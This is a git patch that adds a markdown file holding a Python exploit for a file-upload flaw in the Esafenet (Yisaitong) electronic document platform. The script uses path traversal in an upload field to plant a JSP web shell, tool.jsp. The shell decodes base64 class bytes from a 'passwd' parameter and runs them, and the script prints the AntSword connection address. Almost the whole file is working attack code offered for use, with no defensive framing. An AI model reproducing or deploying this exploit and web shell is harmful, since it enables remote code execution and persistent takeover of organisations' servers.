From e899ceb9c7960c4168c9a599e2f65b1cfab12e03 Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Sat, 19 Aug 2023 21:12:38 +0800
Subject: [PATCH] =?UTF-8?q?Create=20=E4=BA=BF=E8=B5=9B=E9=80=9A=E7=94=B5?=
 =?UTF-8?q?=E5=AD=90=E6=96=87=E6=A1=A3=E5=B9=B3=E5=8F=B0=E6=96=87=E4=BB=B6?=
 =?UTF-8?q?=E4=B8=8A=E4=BC=A0=E6=BC=8F=E6=B4=9E.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 亿赛通电子文档平台文件上传漏洞.md | 53 +++++++++++++++++++++++++++++++
 1 file changed, 53 insertions(+)
 create mode 100644 亿赛通电子文档平台文件上传漏洞.md

diff --git a/亿赛通电子文档平台文件上传漏洞.md b/亿赛通电子文档平台文件上传漏洞.md
new file mode 100644
index 0000000..cbdc80d
--- /dev/null
+++ b/亿赛通电子文档平台文件上传漏洞.md
@@ -0,0 +1,53 @@
+## 亿赛通电子文档平台文件上传漏洞
+
+```
+import requests
+from urllib.parse import urljoin
+import sys
+payload="/CDGServer3/fileType/importFileType.do?flag=syn_user_policy"
+request_file = {'fileshare':(('/..\..\..\..\webapps\ROOT\\tool.jsp',"""<%!
+ class U extends ClassLoader {
+ U(ClassLoader c) {
+ super(c);
+ }
+ public Class g(byte[] b) {
+ return super.defineClass(b, 0, b.length);
+ }
+ }
+
+ public byte[] base64Decode(String str) throws Exception {
+ try {
+ Class clazz = Class.forName("sun.misc.BASE64Decoder");
+ return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
+ } catch (Exception e) {
+ Class clazz = Class.forName("java.util.Base64");
+ Object decoder = clazz.getMethod("getDecoder").invoke(null);
+ return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
+ }
+ }
+%>
+<%
+ String cls = request.getParameter("passwd");
+ if (cls != null) {
+ new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
+ }
+%>"""))}
+def title():
+ print("""
+ 亿赛通文件上传
+ """)
+def exp(url):
+ url1=urljoin(url,payload)
+ req=requests.post(url=url1,files=request_file,verify=False,timeout=5)
+ shell=urljoin(url,"tool.jsp")
+ if(req.text.find("xmlFail")>0):
+ print("成功!")
+ print("蚁剑连接地址%s,密码passwd"%shell)
+if __name__ == '__main__':
+ title
+ if(len(sys.argv) !=2):
+ print("eg:python exp.py url")
+ else:
+ exp(sys.argv[1])
+
+```